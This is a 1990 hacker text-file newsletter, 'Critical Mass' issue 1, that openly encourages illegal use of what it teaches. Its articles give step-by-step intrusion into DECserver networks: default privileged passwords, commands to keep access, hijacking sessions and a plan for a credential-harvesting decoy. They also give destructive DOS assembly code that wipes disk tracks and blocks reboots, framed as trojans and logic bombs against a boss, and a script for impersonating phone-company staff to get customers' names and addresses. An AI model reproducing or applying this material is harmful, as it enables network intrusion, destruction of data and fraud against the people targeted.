_____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 01 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> (09/09/90) l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ Text File Newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 1 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ _____________________________________________________________________________ l Writters l Special thanks to.... l l__________________________l________________________________________________l l l l l The Beaver l The Baron (For info and a place for TLH area) l l BIOC AGENT l (hackers to call .................) l l Mark Tabas l Pink Floyd (Same as above....................) l l l l l l Cool Breeze, The Highwayman, Rowag, and all l l l former members of Chaos Control, Copy Cat l l l (excluding Doug Ferrell), and Special Forces. l l l Also, Gator off of UF EitherNet, Mentilist, l l l The Nut-Kracker ,The Sysop of the Hurrican l l l Hole, and the sysop of Warriers Retreat. l l__________________________l________________________________________________l * Note: We, the writters and editors, of this text newsletter are not respossible for any injuries or prosecutions due to the information giving in this text. EXPERIMENT AT YOUR OWN RISK! Anybody who is willing, can submit an article! If you wish to submit an article, please e-mail either 'The Beaver' or the 'Nut- Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All sysops can freely download this text in the terms that it is not altered and none of the credits are change. So................. please act like a human! Also, for your convience, every now and then a 'volume' of the Critical Mass is created. That is, after three to five issues (roughly 50k to 70k of text) a compiled text will be made containing the past issues, so if you have missed any issues,you can download the volume you need. In order for this text to keep on being produced, you the reader needs to submit, either it be by asking questions (Which will sometime be included in the text) or by submitting and article. Any articles on Hacking, Fone Phreaking, Credit Card Surfing, Pirating, Chemistry, etc. our welcome. Any general 'not accepted' material is accepted here! Articles can be on anything from 'how to rip off this type of coke machine' to 'how to build a Axis bomb from spare car parts'. We hope you enjoy the information given and find some use for it. /\ /\/\ Chief Editors Brought To You By /\/\/\ ~~~~~~~~~~~~~ Members of /\/\/\/\ The Beaver (SC/HA) /\/\/\/\/\ The Nut-Kracker /\/\/\/\/\/\ /\/Critical\/\ \/\/\Mass/\/\/ (SC/HA) \/\/\/\/\/\/ \/\/\/\/\/ \/\/\/\/ \/\/\/ \/\/ \/ ______________________________________________________________________________ l This issue contains articles of the following..... l l____________________________________________________________________________l l l l I - Editorial about Critical mass, written by 'The Beaver' l l II - Hacker DEC200 and Preformance 4000 networks, written by 'The Beaver'l l III - Destructive Viruses, Trojans, etc for your IBM PC!, by 'The Beaver' l l IV - Basic Telecomunication, written by 'BIOC AGENT' l l V - Better Homes and B-Boxing, written by Mark Tabas(c) C.C.C l l VI - Virus Scare, written by 'The Beaver' for Online Magazine. l l VII - Virus Storys, written by 'The Beaver', for Online Magazine. l l____________________________________________________________________________l ____________________________________________________________________________ l I. Editorial: What is Critical Mass? l l Written By 'The Beaver' l l__________________________________________________________________________l I have been involved with telecomunications via modem since the age of 13. I'm now currently 18, and still telecommunicating strong. Over the years I have seen many changes in telecommunications in my area. When I first started using a modem, I quickly noticed the free exchange of information on various bulletin boards in my town. People know as 'hackers','fone phreaks', and 'pirates' constantly exchange information. This is not the case now. All the old boards have closed down, and the 'modem police' have arrived setting examples for other bulletin boards in our town, except for an extreme few. Now it seems that ever conversion on every board, except for two that I can think of, is along the lines of 'Gee, hi bob, hows the wife and kids?'. I usually think to myself 'WHO THE HELL CARES?' and 'Gee, it would be nice to know of several BBS's in my town that you could comunicate freely, and not be kicked off. I don't mean that every BBS in town, you should be able to post up other peoples credit card numbers, but at least be a little open minded. Well before this starts to sound like the Nut-Krackers NFSA text, I will get to the point of why this text newsletter was created. I have lately, as stated earlier, noticed a null in the coversions on the local area BBS's along with a null of comunication between the hackers, pirates, fone phreaks, etc in our area. One reason I feel is that the there aren't that many local area hackers left along with pirates and fone phreaks (At least fone phreaks have a reason for going a little bit under, that is because of AT&T equipment replacing) is because the methods, and traditions , along with basic information was never pasted on. I mean how many people out there can honestly say that they could tell the difference between a ANI and a customer loop in telefone terms? Can YOU set up a decoy to hack into a system? How about a trojan horse? Can you write a virus, or have you even seen one in action? Or maybe the question is do you care. If your a human, odds are you do have at least a small bit of intrest. This is who technology increases. Can you honestly tell me that computer securitys methods would not have tight'in up if hackers, fone phreaks, virus creators, and trojan horse creators, had never exsisted. Im not trying to imply that it is 'ok' to create a virus, but do you really think that by not discussing the matter and not getting information is going to help? Of course not. Any programer who has the urge to destroy your system will do so. So basicly, this text was written to get the young hacker/fone phreak/pirate started. If you do not like it, so sue me. After all, it is completely legal to write and discuss and ,yes, give detail information out on these and other issues, so no, your not a criminal for simply downloading this text. That choice is made when you decide how you would like to use the information given...... As for myself, I bet you can guess how I use alot of the information given. At any rate, take it for what it worth, and I hope you enjoy the text, and the others to follow!!! Well, lets cut the editorial short, and get some information flowing. ______________________________________________________________________________ l II. Hacking DEC200 and Preforance 4000 network Servers l l Written By 'The Beaver' l l Part I l l____________________________________________________________________________l After vigerous, and intensive research by myself and The Nut-Kracker (Members of SC/HA - Sterling Cracking/Hacking Association), this article was written and contains information never disclosed in another text files, newsletter, etc, to the best of our knowlege. The DECserver 200 and Preformance 4000 is a popular networking equipment used by anything from coporations to universitys system. We did most of our 'research' illegally on the dozens of ethier networks off of FIRN (Florida Information Resource Network (904)488-0650 - (904)488-0657) and Tymnet. We have pretty much wore out our welcome on FIRN, but if you care to, you can test some of the information given in this article out on some of the DECserver 200 and Preformance 4000's on FIRN. Who knows, you may strike it lucky!! Basic commands by nonprivileged access. First off, on DECsevers and Performance 4000 you are either a privileged user or a non-privileged user. As a privileged user, you may use commands that no normal user can use. As a privileged user, you can logout users, set up services, initilize the system, changes the servers charateristics, and much, much more, but first you must be know how to use some of the more basic nonprivileged commands and you must no some of the more basic terms. The commands with the `*`. beside them sometimes require that you are privileged. This all depends on the servers charateristics. The short hand for each command is written beside the commands. Commands Terms --------------- ---------------------- *Show users - Sho u Inactivity Timer Show ports - Sho por Keepalive Timer Show ports (#) - Sho por (#) Init Timer Broadcast port - Bro por (#) Console port *Show server - Sho serv *Show nodes - Sho no Connect (name) - c (service name) Most of these commands are explain themself, but lets lets explain them anyway......... Commands. ----------------------------------------------------------------------------- Show Users - Does exactly as it states, show all the users and shows what services they are connected to. Show Port - Shows all the charateristics of the port you are currently connected too. Show port (#) - Shows a specific port charateristics that can be other than the port your own port. It can also be in the form of 'sho por all'. This will show on a DECsever 200 all the ports charateristics. On a performace 4000, it will show all the ports and there current states. That is, if they are 'connected','idle' or are in 'local' mode. To get this effect on a DECserver 200, you type 'sho por all brief'. Broadcast port (#) - This will send a message to a specific port. On DECserver 200's, it poses a problem because you can interrupt a command. So, when your typing a command and someone sends you a message, it interrupts the command and you have to re-type it. On Performance 4000's, this does not happen. Show Server - Shows the servers charateristics. It shows the console port, keepalive timers, inactivity timers, etc, of that server. Show Nodes - Show services that are not currently up in the service list. Any nodes that are not in the service list is not reachable by non-privileged users. Connect - self explanitory Terms ------------------------------------------------------------------------------- Inactivity Timer - Logs ports out if no activities or connections are created. It is usually set to 30 minutes. Thats its default. Keepalive Timer - Keep a port active when any illegal logout has been done. This is usually set to 30 minutes. This is also its default. Init Timer - Show when the next initilization of the server will take place. When a initilization happens, everything is back to its default and all counters are reset to zero. (*Note: Sometimes a you can type 'show counters' to see there values.) Console port - The main port where privileged is usually set under. On a initilization, all information of the server is dumped to the console port. If you would like to get more help on commands or would like to learn more commands, type 'help' at the local prompt of and DEC made server. Here are somemore commands you need to know under a privileged port. The non-privileged commands will still work on a privileged port. Heres the list of what is covered. Command list ------------------------------------------------------------------------------ Set server password (password) - set serve pass (0-32 chr$) Set inactivity (enabled/disabled) - set inact (e/d) Set keepalive (enabled/disabled) - set keep (e/d) Set interrupt (enabled/disabled) - set inter (e/d) Logout port (#) - lo por (#) Set service (service name) (enabled/disabled) - set servi (name) (e/d) zero (service name) - z (name) Set node (node name) (enabled/disabled) - (none) Commands ------------------------------------------------------------------------------ Set server password - This is used to change the privileged password. If you care to remain a network operator, then DON'T CHANGE IT! There are usually no logs kept of people who have logged in, so you can stay privileged for a LOOOOONNNNNGGGGGG time. Set inactivity - This sets the inactivity timer. If a user is not doing anything on a network, he will be logged out. By disabling it, you will never be logged out for not doing anything. Set keepalive - This keeps 'alive' a port if it is logged out. Not to be confused with the inactivity timer. This keeps a session active after logoffs. Set interrupt - This makes it so that you can 'interrupt' sessions to broadcast a message. You can set your interrupts as a non-privileged user, but you can't set other peoples interrupts. To set some other port besides your port , you would type 'set inter por (#) enabled'. Logout port (#) - With non-privileged access you just type 'lo' or 'logout', but with a privileged access you can logout other members on the network. If you want to play with being a network operator, then don't do this. I only did it when I was busted by another user, and then I wouldn't let them back on the network while I was on. Set service - This disables/enables so other user can use them. You can also disable services for specific ports like thus, 'set servi (service name) por (#) disabled'. Zero (Name) - This takes down services (fake or real, explained later on) and takes them off the service the service list and puts them in the node list (if there real services) to where non-privileged users cannot access them. Set node - This command sets up 'nodes' as 'services' so you access them. Sometimes in the node list, there are sometimes nodes nobody is allowed to have access to. This changes that. You can also set up nodes so only certain ports can access them by typing 'set node (node name) por (#) (enabled/disabled). Actually there is probably a short hand way of doing this, but I remember the format. Its probably something like 'set no', or 'set nod'. Ok, now that we have discussed some basic terms and operations (thanks to all the people who know all this, and had to bare through it) now we can talk about basic hacking information. DECserver and 4000 Default password. On most DECserver and 4000's, when the network is set up, the operator is given a default password. That is, the are given a password that all DEC servers and 4000's are given. It is the network operator that must change it, but the majority they leave it as there default. Beside 'who would want to hack a network sever anyway?'. Actually, there are many, many advantages in hacking network servers. I have only been on two DECserver 200 that had already change there default before I got there. Thats out of 14 servers. Hell thats a 2:14 ratio! I got into a companys network in boston via tymnet using a default!! The odds that the default hasn't been changed! My guess is that since the network doesn't have to be accessed as an operator, and since the network pretty much runs itself, nobody really notices whats going on on the the net. I advise that the first thing you do 'define' the password. That is, when you 'set' a function, it is only set till you logout, but if you define a function, it will change it the next time the system is initilized. You see, if you set the servers password, then it is set for that call, but as soon as you disconnect it is changed back to its original value. If you define it, it will change only when the server is initilized. So as soon as you get on, set the inactivity to disabled, so you have as much time as you want to play with the system, and type....... define serv password system If you got the network operations password by some other means, then replace the word 'system' with the password you got in under. This command will only work if you are already privileged, natually. To become privileged you type..... set privileged (*Short hand:set priv) password: (used the default first, and you will probably have access as network operations) so........type...... password:system After this, define it as the password you got in on. The reason is that most servers automaticly initilizes itself, so if you caught, in a month or so, when the system is initilize, the password will change back to the old password you got in under! Odds are that they won't notice for months! Everytime you get access on the system after you get kicked off, repeat this process. My guess would be that you can stay as a network operator for 6 months to a year by getting caught or not! Setting up loops Loops can be used for a varity of reasons, if it be security or for the 'fallinf in' method. Here is an example of a loop. We'll call the nets A, B, and C. The first example will use only A and B. For this example we will say that all these are DECserver 200's just to keep to simple. Let me note that it doesn't have to be only a DEC200 that loops will work on. These have been choose to keep the example simple......Heres the first, starting at A. DEC 'A' --------------------> DEC 'B' --l l l l l l<----------------------------------l l l----------------------------> To Your desired service. Here's the second....... DEC 'A' -------------------> DEC 'B' --l l ---- DEC 'C' <----------------l l l------------------> To your desired service. If you are caught by a system operators under a loop, they will be lead all over the network (you can loop as many times as you like). The one problem I found with loops was that there is a delay in transmissions of data because of all the networks it is being sent though. I usually don't worry to much about loops, but it can be handy for falling in (mentioned later in text). Heres two example of what loops would look like if you started at A......... DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1 Please type HELP if you need assistance Local>connect B Session established to B DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1 Please type HELP if you need assistance Local>connect A Session established to A DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1 Local>(from here your looped once, yuo can either do this process again or continue from here) Heres an example of the secound example........ DECserver 2000 Terminal Server V2.0 (BL29) - LAT V5.1 Please type HELP if you need assistance Local>connect B Session established to B DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1 Please type HELP if you need assistance Local>connect C Etc,Etc, They may not look to different, but they are........ (Note:You do not have to be privileged to preform a loop) Falling in Behind users..... This method is good for getting a 'peek' at a system you need to want to get into. If a witty programer uses this method, he may be able to set up a trojan horse, but the problem is is that when you logout under an account that you 'fall in' behind, you will more than likely to be never be able to get in on that account ever again. Let me explain. On networks, when you log on from a certain region, you will get the same port always, unless that port is already taken, in which you are re-routed to a port that is open. Above I explained the opertation of the keepalive timer, this is where we take advantage of it. Lets say, in theory, you call (or routed via another network ) to a DECserver (either it be a DEC200 or 4000) as somebody illegally logged out, by say, hanging up without typing 'logout' or what not. As they logout , the keepalive timer keeps there session open and active. If by luck you happen to get the port just as they logout (within the timers limits), you would fall into there session. That is, the keepalive timer keeps the session they logged out under and you go on right as they hang up and instead of getting the DECserver you get another prompt of they system that was perviously being used. Believe it or not, this can happen. Both with luck and skill. I have had this happen several times not knowing what happened, but still the odds are against you. You will be happy to know that with a little skill, patents and using loops, this can be done. The only problem is, as I stated before, is that when you logout, you lose that account. One time I used this method and found myself on a VAX under VMS. I was under someones account using someones password. The easy part is finding the username your under, but you still don't have the password! So, Im sitting in this system and I think 'hey, no big deal, I will change the password so that I can use it for several days?'. What I had forgotten was that it asks for the old password in order to change it to a new one. It does get frustrating to be sitting inside of a system and know the secound you disconnect, its gone, but you can gain alot still. If you try to change the password, your back to password hacking again. Let me attempt to explain what happens and how to use this method. In order to understand, you must understand loops.......the example networks I will use is A and B, we will make them both DEC preformance 4000's in this case (*Note: it is not always nessasary for them to be DEC servers) We will start at network A first. This method is easier if you are accessed as a privileged user. If you are privileged, the first thing you want to do is set you inactivity to disabled so you have plenty of time. If you don't, the don't worry about this. Now you need to show you port (sho por) to see what port your in, after this write down what the results where. Now we start the loop. Now we would connect to B. When we got onto B we would show the port again and write down the results again. Next we would connect back to port A again (we will be under a different port) and show the port again and write down the results. From here we would logout of A and now be put on B. It would be extremely helpful to set your inactivity to disabled here also. Now re-connect to A again , and write down the port you in. You should be on the same port you logged into the first time unless someone has logged onto the port before you. Thats why I suggest you do this late at night when nobody is on yet. Now we know what port you always get logged into from B to A. Now you wait till someone logs onto the port you always get on when you login from B to A. To do this, log back onto A every once and a while and check your port. If you get logged onto a port a different port, show the users and see who is on your port, and what they are connected too. Now we wait even more and do some praying inbetween. We pray that the user will illegally logout. This is common, because normal users find it a hassle to type in 'logout' so usually they will simply hang up. When someone does finnally log onto the port you always get, we wait and simply log onto A from B and see if where in. If we are not, then we sho the users to make sure the user hasn't properly logout. Heres what happens graphicly.......... User --------- DEC A ---------------- To Session Us --------> DEC A -------> DEC B ------l l l l<------------------------l In this case it didn't work.... Heres when it does work....... User l-> DEC A ----------------- To Sesion l l------------ DEC B l Us --------> DEC A ------>l Confusing Huh?, if this didn't cover it to where you can understand E-mail me and I will gladly answer any questions........... A Trap Door...... On A DEC server, The Nut-Kracker and I hit ona trap door (also called a back door). Actually , it is an error in the DECserver software. Im not sure if it works on Preformance 4000's but on some DECservers that are working on a VAX that also runs other operations, it does seem to work. What happened was that I was on a DEC200 and I wasn't to worried about lossing privileged access. So I set myself up as a network operator and began re-initilizing the system. I noticed that there was a console port so I begain to get help on setting up ports as consoles. It told me that if I were a ture console that it would give me a downline dump of all data on the server. Well naturally I wasn intrested in this dump, just to see what it would give me. So I set my port up as a console (set console port (#) enabled) and proceeded initializing the system. It didn't send me a down line dump but instead booted me off! I tried to reconnect several times, but it wouldn't let me do so until about two minutes later, but instead of getting a local prompt I got a '$' prompt which told me I was pobably in someones VMS in a VAX. I was under fairly good access but under no username that I could find, so there for I did not exsist! I logout and tried this process again and it did the same thing. Here's my theory of what happened. I was on Fla. Atlanitic Univ. at the time and I had noticed that in the services that a system called 'KOALA' was avaliable. Evidently the network I was operating off of was also run on that VAX but it was also being used for other things as well. When I re-inited the system, instead of putting me back on the network, it threw me into the VAX! I can't promise that this will work on all DEC200, cause it depends on what it is running on I imagine. One problem I saw was that when you re-init the network, the staff the next morning will notice. So there is a sacrifice, but from what I saw, I was a VERY high level user on that VAX. So it may be worth the risk. Often I notice that if you initialize a network once, the network staff will think nothing of it, but if you keep on doing it they will. Setting up decoys. I cannot be sure of this, but I it MAY be possible to set up a decoy via DECservers. A decoy operates like this, you make a user think he is calling something he is not and give the user a password prompt and a username prompt. When the user types it in, it is set to you. Usually you say something like 'Password invalid' every time he trys it then on the third you kick him off you decoy and set up the real service. Im not sure if it can be done, but I have a feeling it can. I was attempting to setup a decoy on a companys system in boston via Tymnet when they caught me and booted me off. Evidently, they thought I was such a major threat that they change the network name (I accessed it through Tymnet 904-878-2267 in the Tallahassee reigon) so that it would make it tons harder to access it again. I got to the point to where I could set up services that didn't exsist and make them look like they where 'avaliable'. I could even set up services that were not even on the node name list! I set up a service as 'Beaver' stated that it was 'Avaliable' and gave it an identifier of 'this is a test'. After this I spent an hour trying to get it down before the morning came around and people started to show up for work! I did finnally get it down though. Here was my original plan. I was going to take down a service and put it in the nodes list. After this, I was going to create a fake service under the same name. When someone 'connected' or at least they thought, it would send me the username and password. I may have been able to do this through the 'announcement' command, but Im not sure. As I said, I never got past the setting up false services stage, but you may get more lucky than I was. You can only do this through privileged access though. If you anyone does ever setup a actual decoy, PLEASE notify me. If you ever get the chance, see if it can be done. There are BIG, BIG uses of decoys! If you do get the chance, get some help on 'zero','set services', 'set nodes'. If you need any assistance, contact a memeber of the SC/HA If you care to play with any (Digital Equipment Corp.) DEC either nets, heres a couple of places you can go VIA FIRN (Florida Information Resourse Network). All the ones given have THE most slack security I have ever seen in my life. Odds are, you will run into I, or the Nut-Kracker. There are may other Florida area hackers running around on this net. When the first time I logged onto FIRN I thought it was the lamest net I had ever gotten on, be actually it is a fun place to play. Through FIRN you can access BITNET, DOE (Dept. of Education), just about all major universities of florida and some not so major, all sorts of networks, FSU cybers, in-out modems, and MUCH, MUCH more. Please, if you go on, set you interrupt to disabled except for the ones where the '*' is where it really don't matter. If you see me, send me a message! (bro por # 'msg. here) Straight through FIRN (904)488-0650 through (904)488-0657 * SERDC eithernet Though Univ. Fla Eithernet. (UF) Call 200 (DEC200) Call 250 (DEC200) sometimes not up. Call 201 (Prefor.4000) Call 202 (Prefor.4000) *Call 1000 (Select 'VAX')(DEC200) *Call 3000 (DEC200) _____________________________________________________________________ l III. Destructive Programs for your IBM PC. l l Written by 'The Beaver' l l___________________________________________________________________l This artical is the first part of a series, hopefully. We will deal with destructive programs for you IBM PC computer. Actually, the tittle of this artical is a little inacurate, because of the fact that I intend on adding in some code for those Commodore 64\128 users out there also. But first, we will go right into IBM programs to start off with. First off you are going to have to now a few things. A destructive program can be written in about any language. We will be dealing in everything from BASIC programing to Assembly. All the code in Assembly can be entered through a program that all PC users get when the get MSDOS for there computer. T hat program is 'DEBUG'. How To Use Debug As A Assembler. -------------------------------- All of you that are experienced in Assembling with Debug are just going to have to bare though this. Sorry. To start out, what you are going to need is a processor that can save in pure ASC form. This can be a word processor or through Edlin. If you are not use to using Edlin, simply refer to your MSDOS user manual. Its not that hard to understand. Anything that can save in pure ASC form will do just fine. We are going to be making files with a 'COM.' extention, but first lets get a little bit of understanding of the registers. The microprocessor in you IBM has serveral bytes of its own memory, divided into 14 areas called registers. The computer uses these registers to keep track of what is going on. The only real inportant register is the one that keeps track of the number of bytes being written in our case. To display the registers, you type 'r': -r Debug will respond with the names and contents of these registers. Like Thus...... AX=xxxx BX=xxxx CX=0000 DX=xxxx SP=xxxx BP=xxxx SI=xxxx DI=xxxx DS=xxxx ES=xxxx SS=xxxx CS=xxxx IP=xxxx IP=xxxx NV UP EI PL NZ PO NC xxxx:0100 xx xxxx Luckly, not all these registers need to be explained. The only important register it the one with the '0000' after it, or CX. This controls how many bytes are to be written. To change a register we would type.... r (name of the register) Or, in are case to change the number of bytes to write, you would type. r cx It would respond with something like CX 003E : At the ':' you would type the number of bytes to write in hexidecimal. If you do not know HEX. then look it up in a computer book of some kind. This is also not hard information to find. Now, I know you may be saying, 'what the hell are you talking about, but don't fret, it will become more clear. Now, from here, I will just use examples...... Lets say you have the following Assembly code. We will say this is the code. mov ah,1 mov cx,10c int 10 int 20 We would break out a word processor and type the following a 100 ( Tells Debug to Assemble ) mov ah,1 mov cx,10c int 10 int 20 ( You MUST have a space here, in order for it to work ) r cx ( A debug command, as I mentioned above ) 9 ( We will be writting 9 bytes, this is the new value of CX ) n first.com ( This tells debug what to name the file as ) w ( Write the debug file ) q ( Quit debug ) Now remember, this is all enter through a wordprocessor. Do try to write this in debug. Now we will save the completely text file as 'first.scr' Ok, now copy debug to the disk with the text file above on it. Next you would type the following......... debug All this should happen automaticly. You type nothing. I know this is all pretty sketchy details, but I do not wish to make this into a 'how to use Debug' text file. If you have any problems, e-mail me or get a copy of Supercharged MSDOS by Van Wolverton, printed by Microsoft press. If you did get the thing to work and understand somewhat, the cursor after you ran this COM. file should have got bigger. If it didn't then either you don't understand as well as you think or you typed it in wrong. How To Destroy Disk Drives ---------------------------- OK, enough dilly dally and one with the artical. The following has been set up for YOU the user to experiment. I will explain as I go along, I also intend on explaining what to look for if you think a program is a destructive one. Ok, this assembly code........ mov ah,05 mov dl,00 mov dh,00 mov ch,00 mov cl,01 mov al,08 int 13 mov ah,00 mov 21 Now let me explain this code some. This is a trojan horse. Actually it dosn't destroy the disk drive in a physical mannor, but it actually destroys tracks zero or the disk, thus making it unusable by DOS. While you can still use a floppy drive after it has formatted yuor software, this is NOT true for a hard drive. If you notice the line that states 'mov dl,00', this sets that drive to drive A. If this is changed you can risk your hard drive. The only thing you destroy when DL is left at 00 is the disk in drive A, but is you change the number to the hard drive, it WILL DESTROY YOUR HARD DRIVE MAKING IT UNUSABLE, and you have to get it reformatted by the manufacter. Lets now examine the code.... Load AH with a five means format track. mov ah,05 DL contains the drive number. In this case it is drive A (0=A) mov dl,00 DD contains the head number. This is zero. mov dh,00 CH is the track number. As I said earlier, this is zero. mov ch,00 CL contains the sector number. Here it is sector one. mov cl,01 AL contains the number of sectors to be processed. There are eight sectors to one track, so we say... mov al,08 This is a Interupt 13. This is a BIOS interrupt for disk access. int 13 And the program is ended with a interrupt 21 mov ah,00 int 21 So what this small assembly code does is simply wipe out track zero thus making the disk unusable by DOS. As I said before, don't attempt this on your hard drive unless you don't like it. Now building on the code above, we can also accomplish another thing. The code up top simply moves the heads to track zero and wipe out all eight sectors. It basicly reformats track one. The next bit of code doesn't do this, but rather moves the heads of the drive past the innermost track. This is done because on some disk drives, the heads will seize up and the drive must be taken apart to get to them to free them. This only works on some drives though. This s done by telling the computer to move the heads past track 39. The code looks like this...... mov ah,05 mov dl,00 mov dh,00 mov ch,80 mov cl,01 mov ah,08 int 13 mov ah,00 int 21 Remember that 'ch' tell the computer what track to go to. Note its value. It is also possible to even destroy monitors by reprograming the 6845 CRT controller from what I understand, but I have not yet obtained the code or tried to figure it out. I like my monitor to much I guess. At any rate, all the code given here is set for drive A. If you still remember, 'DL' contains your device drive you wish to use. If you also remember, '00' is for drive A. Here are the rest for you to use at your disposal...... 00 - A 01 - B 02 - C You could have probably guessed that, huh? False errors. ---------------------------------- Ok, all the stuff covered so far is good trojan horse material, but lets go into logic bombs for a moment. Im going to take it that we are all use to hearing this term and move on. Creating false errors are good in several ways. They can cause a user to go nuts with his system and also cause no damage to the computer, unless the user gets so mad he beats his machine to death. False errors are just what they sound like; errors that shouldn't be happening. If this code is used, you can add it into a program, thus creating a hassling logic bomb. Take for example..... Lets say that I have added some code into a word processor to create false errors with the disk drive on November 21 and any day after that, and I exchange this program for my bosses word processing program, or hell, I add it straight onto his word processor. Now my boss, we'll call him 'Mr.Dick' comes to work, ok? Now his computer works great up till November 21, right? Now lets say that November 21 rolls around and on this day he writes a long report. Now when he tries to save his report, all he can get are errors. He loses everything, right, because he can't save the data. Mr.Dick decides to take apart his computer to have it fixed, but there is nothing wrong. He tries the software again, but it still doesn't work. So Mr.Dick goes completely insane and kills all of his family and is locked up. Well, I doubt it would go that far but at any rate heres some code....... This code fucks with the disk drive....... mov ah,35 mov al,04 int 21 mov ax,es mov dx,bx mov ds,ax mov ah,25 mov al,13 int 21 mov ax,00 int 21 Heres a simple explantion.....Interrupt vector four (overflow) is read. mov ah,35 mov al,04 int 21 Interrrupt vector 13 (dsk access) ir redirected to vertor vector four. Since this interrupt is not defined, the dsk. interrupt is not serviced. mov ax,es mov dx,bx mov ds,ax mov ah,25 mov al,13 int 21 The program is ended with a interrupt 21. mov ax,00 int 21 So basicly all disk accesses are trapped. The errors you get depend on the buffer size in your CONFIG.SYS file. This can be done with all sorts of devices without much effort. Heres another one for you disk drive. This one triples the load time........ mov ax,0000 mov ds,ax mov bx,0522 (Parameter Address) mov ah,ff (The step rate) mov [bx],ah xor ax,ax int 13 mov,00 int 21 Well this is probably enough for simulated errors, so onward. Simulated Crashes. ------------------------------------ This has always been a classic for the logic bomb. The thing thats is the most difficult about simulated crashes is that it is hard to redirect the Alt-Ctrl-Del function. This is a small program that can do this, and this one is a handy one also. I will explain..........Here's the code......... mov ah,35 mov al,04 int 21 mov ax,es mov dx,bx mov ds,ax mov ah,25 mov al,09 int 21 mov ax,0000 int 21 After you run this program, you will see that in order for you to regain control over the keyboard, you must turn off the computer. The good thing about this is that lets say we have a trojan horse, and we would like to make sure the user won't stop it, you could use this program. As an example, punch in this code and save it as 'nostop.com'. Now create a batch file with the following......... Nostop dir *.* dir *.*/p Not that once the batch file is started, you can't stop it, not even with a warm boot. You must turn off the computer. Now if a trojan horse is started with this first, it can't be stoped. On some peoples systems, they may have uninterruptable power supplys, thus, even when they turn the system off, the program (trojan) keeps going! Well, before I end this file, I would like to state something to all the Commodore users out there. You know, us Commie users (yes, I have one too) have a big problem in writting trojans. It is so noticable when the heads start to bang when formatting, so you never get to far. Also, it is total hell to write a virus on also. So here are to hints for you guys..... As you may or may not know, when a disk is verified, all files with the extention 'USR' are wiped out. Really! Look it up in your manual! A good method for a trojan on the Commie is to write a small program that does this ( the program must look big though. This is to explain the disk access time ). Have the program change all files to USR files, then have it veryify the disk. This will keep the heads from knocking and will kill everything. Also, heres another hint, read the next issue of Critical Mass, because I intent to include part two of the 'Destructive Programs For You IBM PC'. In part two, these are the topics to be discussed............ Part II --------- Simple Data Munipulation. A Virus for your Commodore 64/128 Three viruses for you IBM How to make a text file into a trojan horse. What to look for in deadly files and how to protect yourelf Hopefully we will get all that in the next issue. If you have any insults, questions, threats or comments, please e-mail `The Beaver` at the place at the end of this text.......Till then Chow...... ---====--- The following file was written many years(1983) ago about basic telefone hacking. It would be my guess that the fone numbers given are no good what so ever, but ANI and Customer Loops are still in use. So for your reading enjoyment, I through BIOC AGENTS text file in after alot of editing. IV *******BIOC AGENT 003'S COURSE IN******* -- ** =BASIC TELECOMMUNICATIONS= ** ** PART II ** **************************************** *PREFACE:IN PART II, WE WILL EXPLORE THE VARIOUS SPECIAL BELL #'S, SUCH AS: CN/A, AT&T NEWSLINES, LOOPS, 99XX #'S, ANI,RINGBACK, AND A FEW OTHERS.CN/A:-----CN/A, WHICH STANDS FOR CUSTOMER NAME AND ADDRESS, ARE BUREAUS THAT EXIST SO THAT AUTHORIZED BELL EMPLOYEES CAN FIND OUT THE NAME AND ADDRESS OF ANY CUSTOMER IN THE BELL SYSTEM. ALL #'S ARE MAINTAINED ON FILE INCLUDING UNLISTED #'S.HERE'S HOW IT WORKS: 1) YOU HAVE A # AND YOU WANT TO FINDOUT WHO OWNS IT, E.G. (914) 555-1234. 2) YOU LOOK UP THE CN/A # FOR THAT NPA IN THE LIST BELOW. IN THE EXAMPLE, THEN NPA IS 914 AND THE CN/A # IS 518-471-8111. 3) YOU THEN CALL UP THE CN/A # (DURING BUSINESS HOURS) AND SAY SOMETHING LIKE,"HI, THIS IS JOHN JONES FROM THE RESIDENTIAL SERVICE CENTER IN MIAMI. CAN I HAVE THE CUSTOMER'S NAME AT 914-555-1234. THAT # IS 914-555-1234. "MAKE UP YOUR OWN REAL SOUNDING NAME,THOUGH. 4) IF YOU SOUND NATURAL & CHEERY, THE OPERATOR WILL ASK NO QUESTIONS.HERE'S THE LIST: NPA CN/A # NPA CN/A # --- ------- --- --------------- 201-676-7070 517 313-232-8690202 202-384-9620 518 518-471-8111203 203-789-6800 519 416-487-3641204 ****N/A***** 601 601-961-0877205 205-988-7000 602 303-232-2300206 206-382-8000 603 617-787-2750207 617-787-2750 604 604-432-2996208 303-232-2300 605 402-345-0600209 415-546-1341 606 502-583-2861212 518-471-8111 607 518-471-8111213 213-501-4144 608 414-424-5690214 214-948-5731 609 201-676-7070215 412-633-5600 612 402-345-0600216 614-464-2345 613 416-487-3641217 217-525-7000 614 614-464-2345218 402-345-0600 615 615-373-5791219 317-265-7027 616 313-223-8690301 301-534-1168 617 617-787-2750302 412-633-5600 618 217-525-7000303 303-232-2300 701 402-345-0600304 304-344-8041 702 415-546-1341305 912-784-9111 703 